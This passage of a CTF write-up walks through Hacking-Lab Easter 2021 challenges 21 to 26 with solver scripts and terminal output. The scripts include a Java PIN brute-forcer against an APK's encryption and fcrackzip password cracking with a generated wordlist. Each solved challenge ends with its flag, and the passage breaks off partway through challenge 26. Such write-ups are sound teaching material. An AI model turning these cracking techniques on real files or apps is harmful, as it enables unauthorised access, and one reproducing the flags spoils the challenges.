(len(matches) &lt; 49):\r\n    # a little bit of guessing\r\n    matches.append((left.pop(), left.pop()))\r\n\r\n  r = None\r\n  for m in matches:\r\n    r = s.post(url+'\/solve', data={'first':m[0], 'second':m[1]}, proxies={'http':'http:\/\/localhost:8080'})\r\n  if (rnd == 10):\r\n    print(r.text)\r\n  elif (r.text != 'nextRound'):\r\n    print('fail')\r\n    quit()\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nIf the above mentioned strategies did not find all matches, the script chooses the remaining matches randomly. Though it turned out to be relatively reliable.\r\n<\/p>\r\n\r\n<p>\r\nRunning the script yields the flag:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/21]\r\n\u2514\u2500$ .\/solv0r.py\r\nRound 1\/10\r\n- found 49 matches\r\npairs left: []\r\nRound 2\/10\r\n- found 49 matches\r\npairs left: []\r\nRound 3\/10\r\n- found 49 matches\r\npairs left: []\r\nRound 4\/10\r\n- found 49 matches\r\npairs left: []\r\nRound 5\/10\r\n- found 48 matches\r\npairs left: [17, 22]\r\nRound 6\/10\r\n- found 49 matches\r\npairs left: []\r\nRound 7\/10\r\n- found 49 matches\r\npairs left: []\r\nRound 8\/10\r\n- found 48 matches\r\npairs left: [84, 98]\r\nRound 9\/10\r\n- found 48 matches\r\npairs left: [19, 71]\r\nRound 10\/10\r\n- found 49 matches\r\npairs left: []\r\nok, here is your flag: he2021{0k-1-5u44end3r-y0u-w1n!}\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{0k-1-5u44end3r-y0u-w1n!}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_22\">HE21.22 46 Apes<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge22.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"medium\">6 (medium)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Misc<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>200<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>PS<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\n46 apes encoded a message for you:\r\n\r\n<span class=\"hl\">2Qu93ZhJHdsMGIlhmcgUXagMWe19icmBGbnFiOoBTZwIjM7FGd0gHdfNTbuB2a5V2X1JzcuF3MzNQf==<\/span>\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nThe provided string looks <span class=\"hl\">base64<\/span> encoded, but does not decode to something useful:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/22]\r\n\u2514\u2500$ echo 2Qu93ZhJHdsMGIlhmcgUXagMWe19icmBGbnFiOoBTZwIjM7FGd0gHdfNTbuB2a5V2X1JzcuF3MzNQf==|base64 -d|hexdump -C\r\n00000000  d9 0b bd dd 98 49 1d db  0c 18 89 61 99 c8 14 5d  |.....I.....a...]|\r\n00000010  a8 0c 59 ed 7d 89 c9 81  19 b9 c5 88 ea 01 4d 9c  |..Y.}.........M.|\r\n00000020  08 8c ce c5 19 dd 20 1d  d7 cd 4d bb 81 d9 ae 55  |...... ...M....U|\r\n00000030  d9 7d 49 cd cb 85 dc cc  cd 41                    |.}I......A|\r\n0000003a\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nTrying to make some sense of this data did not lead to anything. So I moved a step backwards and tried to reconsider if the provided string is really <span class=\"hl\">base64<\/span>.\r\n<\/p>\r\n\r\n<p>\r\nThe name of the challenge is a hint: <span class=\"hl\">46 apes<\/span>. By changing two characters at a time we get <span class=\"hl\">64 pase<\/span>, which reminds of <span class=\"hl\">base64<\/span>. By doing the same thing (changing each subsequent two characters) on the provided string we get the correct <span class=\"hl\">base64<\/span> encoded string:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n#!\/usr\/bin\/env python3\r\n\r\nfrom base64 import b64decode\r\n\r\ns = '2Qu93ZhJHdsMGIlhmcgUXagMWe19icmBGbnFiOoBTZwIjM7FGd0gHdfNTbuB2a5V2X1JzcuF3MzNQf=='\r\nr = ''\r\nfor i in range(0, len(s), 2):\r\n  b = s[i:i+2]\r\n  r += b[::-1]\r\n\r\nprint(b64decode(r.encode()))\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nRunning the script outputs the flag:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/22]\r\n\u2514\u2500$ .\/rox0r.py   \r\nb'Congrats, here is your flag: he2021{th4ts_m0nkey_bus1n3ss}'\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{th4ts_m0nkey_bus1n3ss}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_23\">HE21.23 Eggcryptor<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge23.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"medium\">6 (medium)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Reversing<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>200<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>PS<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nEggcryptor is hiding something from you.\r\n\r\nCrack it and get the Easter Egg!\r\n\r\n<span class=\"fake_link\">eggcryptor.apk<\/span>\r\n\r\n<b>Hint<\/b>\r\n\r\nYou don't need to run the app. Just decompile and analyze it.\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nThe provided file is an android application, which can be decompiled e.g. using <a href=\"https:\/\/github.com\/skylot\/jadx\" rel=\"noopener noreferrer\" target=\"_blank\">jadx<\/a>.\r\n<\/p>\r\n\r\n<p>\r\nWithin the <span class=\"hl\">MainActivity<\/span> of the application, we can see that there seems to be an <span class=\"hl\">EditText<\/span>, in which a PIN is supposed to be entered:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_23_01.png\" alt=\"Eggcryptor\"\/>\r\n<\/p>\r\n\r\n<p>\r\nIf the entered PIN matches a given pattern (<span class=\"hl\">p.matcher(pin.getText().matches()<\/span>), <span class=\"hl\">Crypto.decrypt<\/span> is used to decrypt the String <span class=\"hl\">r<\/span>, which was read from the resource <span class=\"hl\">R.raw.raw<\/span>.\r\n<\/p>\r\n\r\n<p>\r\nThe decrypted byte array is then used as an image via <span class=\"hl\">image.setImageBitmap<\/span>.\r\n<\/p>\r\n\r\n<p>\r\nThe <span class=\"hl\">Crypto.decrypt<\/span> function uses <span class=\"hl\">AES<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_23_02.png\" alt=\"Eggcryptor\"\/>\r\n<\/p>\r\n\r\n<p>\r\nThe regex used to verify the PIN pattern (<span class=\"hl\">[a-z][0-9]{4}<\/span>) can be found in <span class=\"hl\">strings.xml<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_23_03.png\" alt=\"Eggcryptor\"\/>\r\n<\/p>\r\n\r\n<p>\r\nAccordingly the PIN has to begin with a lowercase character followed by 4 digits.\r\n<\/p>\r\n\r\n<p>\r\nSince this sounds pretty bruteforceable, I copy-pasted the decrypt routine to a new java class and added a bruteforcer around it.\r\n<\/p>\r\n\r\n<p>\r\nThis bruteforcer reads the encrypted bytes from the resource file <span class=\"hl\">raw.raw<\/span> (can be retrieved by simply decompressing the <span class=\"hl\">.apk<\/span> file) and tries to decrypt them with all PIN combinations. If the decryption does not raise an exception, it does not necessarily mean that the PIN was correct. Thus we have to check the output. In order to do this, we can simply write the output to a file and run <span class=\"hl\">file<\/span> on it. Here is the class:\r\n<\/p>\r\n\r\n<p>\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\nimport java.io.*;\r\nimport java.util.Base64;\r\nimport javax.crypto.Cipher;\r\nimport javax.crypto.SecretKeyFactory;\r\nimport javax.crypto.spec.PBEKeySpec;\r\nimport javax.crypto.spec.SecretKeySpec;\r\n\r\npublic class Crax0r {\r\n\r\n  public static void main(String args[]) throws Exception {\r\n    \/\/ read encrypted resource\r\n    BufferedReader br = new BufferedReader(new FileReader(\"raw.raw\"));\r\n    StringBuilder sb = new StringBuilder();\r\n    String line = br.readLine();\r\n    while (line != null) {\r\n      sb.append(line);\r\n      line = br.readLine();\r\n    }\r\n    String enc64 = sb.toString();\r\n    br.close();\r\n    \r\n    \/\/ alphabet from regex: [a-z][0-9]{4}\r\n    String alpha1 = \"abcdefghijklmnopqrstuvwxyz\";\r\n    String alpha2 = \"0123456789\";\r\n    for (int i0 = 0; i0 &lt; alpha1.length(); i0++) {\r\n      for (int i1 = 0; i1 &lt; alpha2.length(); i1++) {\r\n        for (int i2 = 0; i2 &lt; alpha2.length(); i2++) {\r\n          for (int i3 = 0; i3 &lt; alpha2.length(); i3++) {\r\n            for (int i4 = 0; i4 &lt; alpha2.length(); i4++) {\r\n              String pin = \"\" + alpha1.charAt(i0)+alpha2.charAt(i1)+alpha2.charAt(i2)+alpha2.charAt(i3)+alpha2.charAt(i4);\r\n              try {\r\n                byte d[] = decrypt(pin, enc64);\r\n                check_output(d, pin);\r\n              } catch(Exception e) { }\r\n            }\r\n          }\r\n        }\r\n      }\r\n    }\r\n  }\r\n\r\n  public static void check_output(byte[] d, String pin) {\r\n    try {\r\n      FileOutputStream fos = new FileOutputStream(\"out_\"+pin);\r\n      fos.write(d);\r\n\r\n      Process p = Runtime.getRuntime().exec(\"file out_\"+pin);\r\n      String line;\r\n      Reader r = new InputStreamReader(p.getInputStream());\r\n      BufferedReader in = new BufferedReader(r);\r\n      while ((line = in.readLine()) != null) System.out.println(line);\r\n      in.close();\r\n    }\r\n    catch (Exception e) { }\r\n  }\r\n\r\n  public static byte[] decrypt(String pin, String enc64) throws Exception {\r\n    byte[] salt = new byte[8];\r\n    for (int i = 0; i &lt; 8; i++) {\r\n      salt[i] = (byte) i;\r\n    }\r\n    SecretKeySpec key = new SecretKeySpec(SecretKeyFactory.getInstance(\"PBKDF2WithHmacSHA256\").generateSecret(new PBEKeySpec(pin.toCharArray(), salt, 10000, 128)).getEncoded(), \"AES\");\r\n    Cipher cipher = Cipher.getInstance(\"AES\");\r\n    cipher.init(2, key);\r\n    byte[] decodedBytes = Base64.getDecoder().decode(enc64);\r\n    String decodedString = new String(decodedBytes);\r\n    return cipher.doFinal(decodedBytes);\r\n  }\r\n\r\n}\r\n                                                                              \r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nRunning it displays the potentially correct PINs with the associated filetype:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/23]\r\n\u2514\u2500$ javac Crax0r.java && java Crax0r\r\nPicked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true\r\n^BPicked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true\r\nout_a0158: data\r\nout_a0837: PGP Secret Key -\r\nout_a1107: data\r\nout_a1202: data\r\nout_a1669: data\r\nout_a2073: data\r\nout_a2181: data\r\nout_a2346: data\r\nout_a2366: data\r\nout_a2629: data\r\nout_a2643: data\r\n...\r\nout_g0717: PNG image data, 1024 x 1024, 8-bit colormap, non-interlaced\r\n...\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe PIN <span class=\"hl\">g0717<\/span> produced a valid PNG image:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_23_04.png\" alt=\"Egg\"\/>\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/23]\r\n\u2514\u2500$ zbarimg out_g0717     \r\nQR-Code:he2021{th3r3s_4_h4ck_4_th4t}\r\nscanned 1 barcode symbols from 1 images in 0.05 seconds\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{th3r3s_4_h4ck_4_th4t}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_24\">HE21.24 Taco Cat<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge24.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"medium\">6 (medium)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Crypto<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>200<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>PS<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nWas it a cat I saw?\r\n\r\n<span class=\"fake_link\">tacocat.zip<\/span>\r\n\r\n<b>Hint<\/b>\r\n\r\nlowercase\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nThe provided file is a zip archive:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/24]\r\n\u2514\u2500$ file tacocat.zip          \r\ntacocat.zip: Zip archive data, at least v2.0 to extract\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe archive contains the file <span class=\"hl\">eggge.png<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/24]\r\n\u2514\u2500$ zipinfo tacocat.zip \r\nArchive:  tacocat.zip\r\nZip file size: 19056 bytes, number of entries: 1\r\n-rw-r--r--  3.0 unx    20477 BX defN 20-May-19 10:51 eggge.png\r\n1 file, 20477 bytes uncompressed, 18860 bytes compressed:  7.9%\r\n\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThough it is encrypted:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/24]\r\n\u2514\u2500$ unzip tacocat.zip   \r\nArchive:  tacocat.zip\r\n[tacocat.zip] eggge.png password:\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nBoth the name of the challenge (<span class=\"hl\">taocat<\/span>) as well as the filename (<span class=\"hl\">eggge.png<\/span>) looks like an anagram. Thus I created a wordlist based on <a href=\"https:\/\/github.com\/danielmiessler\/SecLists\/blob\/master\/Passwords\/Most-Popular-Letter-Passes.txt\" rel=\"noopener noreferrer\" target=\"_blank\">Most-Popular-Letter-Passes.txt<\/a> with anagram passwords using the following script:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n#!\/usr\/bin\/env python3\r\n\r\nwl = '\/usr\/share\/wordlists\/SecLists\/Passwords\/Most-Popular-Letter-Passes.txt'\r\n\r\nwords = open(wl).read().split('\\n')\r\n\r\nf = open('wl.txt', 'w')\r\nfor w in words:\r\n  w_new = w + w[::-1][1:]\r\n  f.write(w_new+'\\n')\r\nf.close()\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe script takes each password from the original wordlist and creates an anagram of it:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/24]\r\n\u2514\u2500$ cat wl.txt\r\n...\r\nabacocaba\r\nabacusucaba\r\nabadaba\r\nabadanadaba\r\nabadiaidaba\r\nabaefeaba\r\nabagailiagaba\r\nabahaba\r\nabalaba\r\nabalonenolaba\r\nabalosolaba\r\nabamcmcmaba\r\n...\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nUsing <span class=\"hl\">fcrackzip<\/span> and the generated wordlist, we can crack the password quite fast:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/24]\r\n\u2514\u2500$ fcrackzip -D -p wl.txt -u -v tacocat.zip\r\nfound file 'eggge.png', (size cp\/uc  18872\/ 20477, flags 9, chk 866d)\r\n\r\n\r\nPASSWORD FOUND!!!!: pw == mousesuom\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nUsing the password <span class=\"hl\">mousesuom<\/span> we can unzip the archive:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/24]\r\n\u2514\u2500$ unzip tacocat.zip \r\nArchive:  tacocat.zip\r\n[tacocat.zip] eggge.png password: \r\n  inflating: eggge.png               \r\n\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/24]\r\n\u2514\u2500$ file eggge.png                          \r\neggge.png: PNG image data, 1024 x 1024, 8-bit colormap, non-interlaced\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_24_01.png\" alt=\"Egg\"\/>\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/24]\r\n\u2514\u2500$ zbarimg eggge.png \r\nQR-Code:he2021{!y0.ban4na.b0y!}\r\nscanned 1 barcode symbols from 1 images in 0.05 seconds\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{!y0.ban4na.b0y!}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_25\">HE21.25 Lots of JWTs<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge25.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"medium\">6 (medium)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Misc<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>200<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>PS<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nSo many JWTs! What do they hide?\r\n\r\n<span class=\"fake_link\">jwts.txt<\/span>\r\n\r\n<b>Hint<\/b>\r\n\r\nYou better write a script.\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nThe provided text file contains a huge <span class=\"hl\">JWT<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/25]   \r\n\u2514\u2500$ head -c 1000 jwts.txt\r\neyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJjdDIiOiJleUowZVhBaU9pSktWMVFpTENKaGJHY2lPaUpTVXpJMU5pSjkuZXlKamRESWlPaUpsZVVvd1pWaEJhVTlwU2t0V01WRnBURU5LYUdKSFkybFBhVXBUVlhwSk1VNXBTamt1WlhsS2FtUkVTV2xQYVVwc1pWVnZkMXBXYUVKaFZUbHdVMnQwVjAxV1JuQlVSVTVMWVVkS1NGa3liRkJoVlhCVVZsaHdTazFWTlhCVGFtdDFXbGhzUzJGdFVrVlRWMnhRWVZWd2MxcFdWblprTVhCWFlVVkthRlpVYkhkVk1uUXdWakF4VjFKdVFsVlNWVFZNV1ZWa1MxTkdhM2xpUmtKb1ZsaENWVlpzYUhkVGF6RldUbGhDVkdGdGRERlhiR2h6VXpKR2RGVnJWbE5XTW5oUldWWldkMDFXYkhGVWFrSnBWakJ3U1ZWdE1ERmlWbFYzWWtod1ZGWjZSbnBhVnpGUFRsWk9WVmRyY0dsV01taDZWVEZqTUdRd2VIUmFSRTVYVWxVMWMxZEVSbXRPVm1SeVlVVnNXbFpyU2paVk1HaDNWakpLYzFKVVFsVlNNMDB4Vkd4a1JtVnJPVWxSYTNCUVVtczFZVnBJY0ZOa2F6VnhVVzFzYTFKSGFESldNRlpoVFVkU1NWUnRkRk5pUjJoRVdrYzFTMkpYVG5KalJUbE5WMGRuZUZwRVFscGtNVlpaVld4Q1lWSldjRWhaTVZwRFZXMU9XRTFYV2xSU1JsWXdXVEZTUjFadFJsbGhSbWhUWVRKNE5WbHNXbUZXTWtaeVdrWkdWMkp1UWpKYVZXaERWRlpaZWxScVFrMVdNbWhXVlZaak5XUlhUblJQVjJ4WVZtdGFjRmt5YTNoa1JuQkhWRzVLYUUxdGFGcFVNVkpoWVVkR1JtVkhOVnBoTTFKS1ZqQm9SbVF5VG5Sa1JWcHJWa1ZhVlZkVVJ\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nA <span class=\"hl\">JWT<\/span> is structured like this: <span class=\"hl\">&lt;HEADER&gt;.&lt;PAYLOAD&gt;.&lt;SIGNATURE&gt;<\/span>.\r\n<\/p>\r\n\r\n<p>\r\nThe single components are <a href=\"https:\/\/tools.ietf.org\/html\/rfc4648#section-5\" rel=\"noopener noreferrer\" target=\"_blank\">base64url<\/a> encoded without the optional padding (<span class=\"hl\">=<\/span>).\r\n<\/p>\r\n\r\n<p>\r\nIn order to decode the <span class=\"hl\">PAYLOAD<\/span>, we can split the <span class=\"hl\">JWT<\/span> by dots (<span class=\"hl\">.<\/span>) and <span class=\"hl\">base64<\/span> decode the second entry:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/25]\r\n\u2514\u2500$ cat jwts.txt|cut -d '.' -f2|base64 -d\r\n{\"ct2\":\"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJjdDIiOiJleUowZVhB...\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe <span class=\"hl\">JSON<\/span> output is quite big again and seems to contain multiple properties, which again contain a <span class=\"hl\">JWT<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/25]\r\n\u2514\u2500$ for f in $(cat jwts.txt|cut -d '.' -f2|base64 -d|tr , '\\n'); do echo $f|head -c60;echo; done\r\nbase64: invalid input\r\n{\"ct2\":\"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJjdDIiOiJleUo\r\n\"ct1\":\"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJjdDIiOiJleUow\r\n\"ct4\":\"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJjdDIiOiJleUow\r\n\"ct3\":\"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJjdDIiOiJleUow\r\n\"iss\":\"he\"}\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThus I wrote the following script, which recursivly parses the <span class=\"hl\">JWT<\/span>s. Properties with a name other than <span class=\"hl\">ct1<\/span>, <span class=\"hl\">ct2<\/span>, <span class=\"hl\">ct3<\/span>, <span class=\"hl\">ct4<\/span> or <span class=\"hl\">iss<\/span> are printed:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n#!\/usr\/bin\/env python3\r\n\r\nfrom base64 import b64decode\r\nimport json\r\n\r\n\r\ndef b64url_decode(s):\r\n  return b64decode(s.replace('-', '+').replace('_','\/')+'='*((-len(s))%4))\r\n\r\ndef jwt_get_data(s):\r\n  h = s.split('.')\r\n  if (len(h) == 1):\r\n    return h[0]\r\n  return json.loads( b64url_decode(h[1]).decode() )\r\n\r\ndef jwt_get_data_rec(j):\r\n  r = ''\r\n  i = 1\r\n  key = 'ct'+str(i)\r\n  while (key in j):\r\n    j_child = jwt_get_data(j[key])\r\n    if (not isinstance(j_child, str)):\r\n      for k0 in j_child:\r\n        if (k0 not in ['ct1','ct2','ct3','ct4','iss']): print(k0+'='+j_child[k0])\r\n    r += jwt_get_data_rec(j_child)\r\n    i += 1\r\n    key = 'ct'+str(i)\r\n  return r\r\n\r\nct = open('.\/jwts.txt').read()\r\n\r\nj = jwt_get_data(ct)\r\nr = jwt_get_data_rec(j)\r\nprint(r)\r\n\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nRunning the script produces the following output:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/25]\r\n\u2514\u2500$ .\/jwt_solv0r.py\r\niv=f_js0\r\nv=n_t0k\r\niii=nty_0\r\ni=he202\r\nii=1{pl3\r\nvi=k3nZ}\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nBy ordering the substrings via the roman numerals and concatenating them, we get the flag:\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{pl3nty_0f_js0n_t0kk3nZ}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_26\">HE21.26 Lost<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge26.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"medium\">6 (medium)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Forensics<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>200<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>khae<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nOne of the flags accidentally fell into the pot with the rejected ones!\r\n\r\nCan you recover the lost flag?\r\n\r\n<span class=\"fake_link\">lost.pdf<\/span>\r\n\r\n<b>Hint<\/b>\r\n\r\n23\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nThe provided file is a PDF file:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/26]\r\n\u2514\u2500$ file lost.pdf\r\nlost.pdf: PDF document, version 1.3\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe document contains a lot of numbers and potential flags on each other:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_26_01.png\" alt=\"PDF\"\/>\r\n<\/p>\r\n\r\n<p>\r\n<span class=\"hl\">binwalk<\/span> can be used to extract the text data &#8230;\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/26]\r\n\u2514\u2500$ binwalk --extract lost.pdf    \r\n\r\nDECIMAL       HEXADECIMAL     DESCRIPTION\r\n--------------------------------------------------------------------------------\r\n0             0x0             PDF document, version: \"1.3\"\r\n141           0x8D            Zlib compressed data, default compression\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\n&#8230; which simply consists of 500 flags, proceeded by a number:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/26]\r\n\u2514\u2500$ head _lost.pdf.extracted\/8D\r\n2 J\r\n0.57 w\r\nBT \/F1 12.00 Tf ET\r\nBT 232.78 795.77 Td (One of these is valid, promise) Tj ET\r\nBT 180.11 767.42 Td (001 he2021{KDJDM-UgOMM-k4j5u-ooXKJ-ighjZ}) Tj ET\r\nBT 184.10 767.42 Td (002 he2021{juE4t-VTKG7-fiYWT-EJ7Rx-h2ADI}) Tj ET\r\nBT 180.09 767.42 Td (003 he2021{dNjAc-TbPo4-keeRe-uYYmC-IngBY}) Tj ET\r\nBT 180.77 767.42 Td (004 he2021{mXtuW-lVUVF-8mLpc-jvBHm-0kdI9}) Tj ET\r\nBT 177.43 767.42 Td (005 he2021{c4XNe-gA8wy-uJODH-BKCls-BuT5X}) Tj ET\r\nBT 185.78 767.42 Td (006 he2021{GjuXr-IjpR8-TWZjJ-zTYNb-CJnuh}) Tj ET\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nWhen I initally solved the challenge I used a script which slowly picks and tries a random flag from the list. That worked.\r\n<\/p>\r\n\r\n<p>\r\nThe intended way though is to find flag <span class=\"hl\">23<\/span> and recognize the vertical text (thanks to <span class=\"hl\">keep3r<\/span> for this enlightenment):\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n...\r\nBT 181.08 767.42 Td (020 he2021{XbBo7-PPADN-yjqIb-eEpxp-0GSa5}) Tj ET\r\nBT 175.76 767.42 Td (021 he2021{V1eud-NmSI9-spMWY-oeDe3-otDCU}) Tj ET\r\nBT 178.10 767.42 Td (022 he2021{E0FHN-am9rr-v5UhB-aYeWq-gehBJ}) Tj ET\r\nBT 179.11 767.42 Td (<span class=\"hl2\">023<\/span> he2021{<span 